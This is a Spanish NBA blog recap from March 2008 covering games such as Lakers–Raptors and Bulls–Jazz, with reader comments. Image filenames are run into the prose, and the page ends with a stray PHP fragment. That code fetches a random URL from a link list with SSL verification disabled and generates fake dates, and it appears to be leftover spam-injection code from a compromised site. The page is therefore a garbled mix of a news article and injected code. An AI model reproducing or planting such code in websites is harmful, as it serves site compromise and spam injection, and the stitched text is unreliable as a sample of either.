La crónica (11/03/08)

12 de March de 2008 por MagicJohnson32

Los triunfos de Bulls y Lakers fueron lo más trascendental de lo sucedido en la pasada madrugada. Chicago se aferra a sus opciones de disputar los Playoffs mientras los angelinos se sitúan de nuevo como líderes en solitario del Oeste. Además, los Suns pasaron por encima de los Grizzlies y los Wizards vencieron a los Bucks, con lo que ambos equipos consolidan sus posiciones. Dos partidos entre equipos sin posibilidades reales de disputar los Playoffs completaron la jornada. Os damos más detalles en nuestra crónica:

La crónica:
Los Milwaukee Bucks aún tienen posibilidades para alcanzar los Playoffs ya que tras la derrota de hoy siguen estando sólo a 3 victorias y media de Atlanta, pero con actuaciones nickyoungstevensonredddefensivas tan desastrosas pronto serán descartados de la lucha. El partido contra los Wizards acabó con 97-105 y nos dejó varias conclusiones evidentes. Milwaukee es Redd, Bogut y, por fin, Villanueva. Entre los 3 hicieron 73 de los 97 puntos de su equipo. Los Wizards tiene una buena base de jóvenes para el futuro como Nick Young que hizo su mejor marca anotadora con 22 puntos.

En Indianapolis, los Pacers, liderados por Dunleavy, derrotaron por 107-114 a los Sonics tras un partido de lucha y entrega que por dos veces llevó al joven jugador de Indiana a la enfermería. Pese a ello fue el máximo anotador del encuentro con 32 puntos y 6 rebotes. Seattle, con Kevin Durant en 27 puntos y 5 jugadores más por encima de 10 puntos, no dio en ningún momento el partido por perdido y llegó a estar a 5 puntos a 5 minutos del final. 6 puntos consecutivos de Granger, que acabó con 23, terminaron con las esperanzas de los Sonics que encadenan su quinta derrota consecutiva y ya están oficialmente fuera de Playoffs.

aldridgealjeffPortland, con los caros puestos de playoffs del Oeste cada vez más lejos, lucha por terminar la fase regular con más victorias que derrotas. Liderados una vez más por Brandon Roy, 27 puntos y 9 asistencias, y por Lamarcus Aldridge, 20 puntos, derrotaron 103-96 a los Timberwolves en Minnesota. El equipo local nuevamente se encomendó a la fuerza de Al Jefferson, que consiguió 20 puntos y 10 rebotes pero cometió 11 fallos en 21 intentos. Pese a que otros 4 compañeros anotaron más de 10 puntos, el equipo de Minnesota se llevó una nueva derrota y ya van 49.

Los Bulls se anotaron por 96-108 una victoria esencial ante los Jazz gracias a la gran actuación de Gooden, 24 puntos, 10 rebotes y 5 asistencias, y las aportaciones de Hinrich, Deng y Gordon. No sirvió el magnífico partido de Okur, que anotó 22 puntos y atrapó 18 rebotes, ni los 20 puntos y 10 asistencias de Deron Williams. La lucha por la octava posición del Este se estrecha con tres equipos, Hawks, Nets y Bulls, separados por 0,5 partidos.

shaqboardgrizzLa derrota de los Jazz puede ser importante para los Suns, que con su victoria de anoche, 111-132 ante los Grizzlies, tendrían ventaja de campo en primera ronda ante el equipo de Salt Lake City. Stoudemire, Hill, Bell, Barbosa e incluso Giricek brillaron ante unos Grizzlies en los que apenas cabe destacar a Rudy Gay y en los que cuesta entender los motivos por los que Warrick perdió la titularidad.

Por último, los Lakers recuperaron el liderato del Oeste en solitario con una victoria por 107-117 sobre los Raptors que les permite afrontar con optimismo la gira que les espera (New Orleans, Houston, Dallas y Utah). Kobe brilló como acostumbra ante los canadienses con 34 puntos, 7 rebotes, 7 asistencias y 4 robos, y Odom ejerció de segundo con 20-9-3-2. Entre ambos anotaron 21 de 32 tiros de campo. Gasol estuvo más discreto con 12-7-5, Calderón hizo uno de sus peores partidos del año con sólo 2 puntos y TJ Ford fue el mejor raptor.fishkobejump

Nuestro MVP: Kobe Bryant y Amare Stoudamire han tirado de sus respectivos equipos y los han llevado a la victoria con grandes actuaciones. Pero además destacamos a dos jugadores que no acostumbran a aparecer por aquí como son Charlie Villanueva, 24 puntos y 16 rebotes, Drew Gooden, 24-10-5, y Mike Dunleavy, 32 puntos y 6 rebotes.

El rookie: Récord anotador del rookie de los Wizards Nick Young con 22 puntos, haciendo un poco de sombra al mediático Kevin Durant, que se ha ido a los 27.

La sorpresa: Randy Foye vuelve poco a poco a ofrecer la mismas buenas sensaciones que antes de su lesión. Esta noche ha quedado cerca del triple doble con 9 puntos, 7 rebotes y 8 asistencias. También destacamos el partido de Gordan Giricek, el mejor desde que es jugador de los Suns, y el de Rasho Nesterovic, que ha aumentado sus números intentando paliar la baja de Chris Bosh.

La decepción: Malos partidos de Juan Carlos Navarro (sólo 5 puntos con 1 de 9 en tiros en 28 minutos) y José Calderón (2 puntos y 6 asistencias en 2 minutos). Esperemos que ambos se recuperen del varapalo y vuelvan a rendir como nos tienen acostumbrados.

La canción del día: la carrera por acceder a los Playoffs encara su recta final con muchas cosas aún por decidir. ¿Aguantarán los Hawks su octava plaza del Este? ¿Completarán los Bulls su remontada tras el desastroso inicio de temporada? ¿Sorprenderán los Nets al demostrar que pueden sobrevivir sin Kidd? En el Oeste la cosa es aún más difícil de prever. Los Nuggets han perdido el paso pero no están más que a 2,5 partidos de los Warriors… y a 4 partidos de entrar como cuartos. Una mala racha puede llevar a un aspirante al título a quedarse fuera o a una primera ronda contra los Spurs o los Lakers. Pero todo eso no lo sabremos hasta el 16 de abril, final de la regular season. Hasta entonces, música de los Flaming Lips para cantar esta ‘carrera por el premio’.

“Race for the price” The Flaming Lips

 

Y, por último, éstas fueron las 10 mejores jugadas de la noche:

Comenta

3 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    El premio al peor entrenador de la temporada deberia ir para el técnico de los Bucks sin duda. Tiene una plantilla con un tremendo caudal ofensivo y está haciendo la risa en el Este, ha tardado muchísimo en darle a Villanueva la titularidad y sigue sin darle importancia a Charlie Bell.

    A ver que hacen con el chino, pero deberian utilizarlo para conseguir un alero, visto el rendimiento de Villanueva y el del propio Yi. Uno de los dos que hay ahora mismo el New Jersey seguro que iria encantado y los Nets estarían dispuestos a soltarlo si reciben al chino y algo de hueco aunque sea de cara a 2009.

      Citar

  2. Olafur dice:
    #2

    Ya era malo como jugador pero lo de Krystkowiak como “técnico” es de charlotada mix.

    El asunto del chinito y de Villanueva esta claro que se tendrán que mover si alguien piensa por allí.

      Citar

  3. RusticoColorao dice:
    #3

    Ahora vamos y ganamos a Utah…somos la risa

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>